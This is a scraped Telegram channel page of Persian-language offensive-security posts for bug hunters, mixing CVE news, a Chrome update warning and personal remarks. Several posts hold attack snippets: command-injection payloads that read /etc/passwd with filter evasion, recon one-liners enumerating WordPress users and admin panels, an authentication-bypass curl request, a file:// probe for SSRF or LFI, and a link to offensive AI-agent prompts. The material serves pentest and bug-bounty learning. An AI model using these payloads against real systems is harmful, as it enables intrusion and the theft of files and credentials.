Mandegar SEC🎩 – Telegram
Mandegar SEC🎩
@mandegar_sec
1.93K subscribers
206 photos
13 videos
32 files
268 links
offensive security☕️

owner : @msecadmins_bot🤒

تبادل : @abusersec
گروه : @sec_gap 💣
python : t.me/persianpylearn


#bugbounty #redteam #offsec #secure_coding #infosec #cyber_security #cybersecurity
Download Telegram
About
Blog
Apps
Platform
Join
Mandegar SEC🎩
1.93K subscribers
Mandegar SEC🎩
''Exploiting A Pre-Auth RCE in W3 Total Cache For WordPress (CVE-2025-9501) | RCE Security''


https://www.rcesecurity.com/2025/11/exploiting-a-pre-auth-rce-in-w3-total-cache-for-wordpress-cve-2025-9501/

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#infosec #pentest #redteam #blueteam
6
715 views
Mandegar SEC🎩
⚠️ هشدار امنیتی برای کاربران Google Chrome
گوگل اعلام کرده دو مشکل امنیتی «پرخطر» در مرورگر Chrome شناسایی شده که می‌تواند به هکرها اجازه دهد از طریق وب‌سایت‌های آلوده یا کدهای مخرب، به اطلاعات کاربران دسترسی پیدا کنند.
این یعنی اگر مرورگر به‌روز نباشد، باز کردن یک سایت ناسالم می‌تواند منجر به سرقت اطلاعات، دسترسی غیرمجاز یا اجرای کد مخرب شود.
گوگل برای این مشکل آپدیت امنیتی منتشر کرده و تأکید کرده کاربران نباید منتظر آپدیت خودکار بمانند.
راه‌حل ساده:
Menu ⋮ → Help → About Chrome
آپدیت را نصب کنید و روی Relaunch کلیک کنید.
در صورت بروز هرگونه تهدید دیجیتال با
«میز کمک‌های فوری امنیت دیجیتال میان»
تماس بگیرید:
Signal: +46766860503
Telegram:@miaan_helpline_bot
Email:helpdesk@miaan.org

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
9
2.5K views
Mandegar SEC🎩
شاید باورتون نشه اما باید بگم؛
کسی قرار نیست به خاطر از خود گذشتگی های شما و البته سازگارهای زیاد بهتون مدال بده؛
در نهایت آدم ها با جمله
«مگه من گفتم انجامش بدی»
نا امیدتون میکنن...
پس تلاش کنید
همه جا به اندازه باشید؛
ترمیم روحتون بعدِ شنیدن این جمله کار سختیه...
8👍2🍌1
786 views
Mandegar SEC🎩
📌2FA Bypass Methods



برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel



#infosec #cybersecurity #hacking #pentesting #security
4👍1🍌1
833 views
Mandegar SEC🎩
Simple Command Injection Bypass

1. cat</etc/passwd
2. {cat,/etc/passwd}
3. cat${IFS}/etc/passwd
4. cat%20/et%5C%0Ac/pa%5C%0Asswd
5. cat echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"

🚀 https://github.com/swisskyrepo/PayloadsAllTheThings

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

#BugBounty #RCE #InfoSec
3
836 viewsedited  
Mandegar SEC🎩
This media is not supported in your browser
VIEW IN TELEGRAM
File-Smuggling

HTML smuggling is not an evil, it can be useful

https://github.com/eddiechu/File-Smuggling

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4
760 views
Mandegar SEC🎩
عاجزانه خواهش میکنم فردا نگین (آخ تو شب یلدایه منی)😕
🍌221
606 viewsarmita, edited  
Mandegar SEC🎩
چک لیست امنیت API🛡:
چک لیستی از مهمترین اقدامات متقابل امنیتی هنگام طراحی، آزمایش و انتشار API شما.

https://github.com/shieldfy/API-Security-Checklist


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

#cybersecurity #api #hacking #bughunting
10👍2
524 views
Mandegar SEC🎩
یکی از اینفلوئنسرهای حوزه Ai بنام Robin Eber سایت پایین رو ساخته که بصورت رایگان، پرامپت شما رو آنالیز میکنه و بهش نمره میده.
بهتون میگه که آیا پرامپتتون رو خوب نوشتید یا نه و اگر نه، ایرادش کجاست و چطور میتونید بهترش کنید که بهترین خروجی ممکن رو بگیرید.
https://coach.robinebers.com/
Robinebers
Robin Ebers' AI Prompt Coach
Write AI coding prompts that actually work in 30 seconds. 15 proven principles from OpenAI and Anthropic's research teams.
6👍1
559 views
Mandegar SEC🎩
🚨 3 critical/high FreePBX vulnerabilities disclosed

CVE-2025-66039: Authentication bypass
CVE-2025-61675: SQL injection
CVE-2025-61678: File upload leading to RCE

detection noscripts for these vulns:

https://github.com/rxerium/FreePBX-Vulns-December-25

https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4🏆1
591 viewsedited  
Mandegar SEC🎩
THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org

All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.

Updated monthly.

Try: curl https://ip.thc.org/1.1.1.1

Raw data (187GB): https://ip.thc.org/docs/bulk-data-access

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
8🍌2
604 views
Mandegar SEC🎩
شب یلداتون مبارک باشه دوستان❤️
7🍌2
624 views
Mandegar SEC🎩
🤖 Offensive-AI-Agent-Prompts :

یه ریپو که یاد میده چطور از هوش مصنوعی به‌ عنوان Agent امنیتی استفاده میشه ، نه فقط یه چت‌بات معمولی.
پرامپت‌ ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیب‌پذیری و بررسی امنیتی چجور انجام میشه .

#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team



https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4👍8🏆2
2.23K viewsedited  
Mandegar SEC🎩
Mandegar SEC🎩
🤖 Offensive-AI-Agent-Prompts : یه ریپو که یاد میده چطور از هوش مصنوعی به‌ عنوان Agent امنیتی استفاده میشه ، نه فقط یه چت‌بات معمولی. پرامپت‌ ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیب‌پذیری و بررسی امنیتی چجور انجام میشه . #Ai : ChatGPT، Gemini-CLI،…
وای بچه ها مرسییییییییییی واقعاااا برا استارز😍😍😍😘😘😘😘
6🍌4
546 viewsarmita, edited  
Mandegar SEC🎩
one liner automation :😎

CSP Bypass Check :
cat alive.txt | httpx -silent -include-response-header | grep -i
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

WordPress Enumeration :

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 |anew wp_users.txt

☠️ Mass PTR lookup

prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt


Exposed Admin Panels

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt


💀 Find Hidden Admin Routes in JS

cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
5🍌1
711 views
Mandegar SEC🎩
CVE-2025-66489 - Authentication Bypass via TOTP Code Presence


curl -X POST http://localhost:3001/api/auth/callback/credentials
  -H "Content-Type: application/x-www-form-urlencoded" \
  -b cookies.txt \
  -c cookies.txt \
  -d "csrfToken=<TOKEN>&email=free@example.com&password=WRONG&totpCode=123456"

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
6
659 views
Mandegar SEC🎩
Forwarded from GO-TO CVE (| | Sharo K h | |)
ای آدمای ناموفق
8
476 views
Mandegar SEC🎩
sanitizer ها
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل می‌شود.

در این PoC، مرورگر یک تگ https: سفارشی ایجاد می‌کند و اجزای URL را به عنوان ویژگی‌های HTML تجزیه می‌کند.

https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
3👍2🏆2
611 viewsMandegar
Mandegar SEC🎩
اگر در حال بررسی سرور IIS ویندوز هستید
یک فایل پیش‌فرض وجود دارد که می‌توانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png

example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.

برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
👍4🏆1
698 views
Mandegar SEC🎩
the-art-of-pivoting.pdf
16.6 MB
The Art of Pivoting
تکنیک‌ هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.


برای دریافت به‌روزرسانی‌های امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel

#pivoting #opensource #cti #threatintelligence #misp
4🏆2
521 views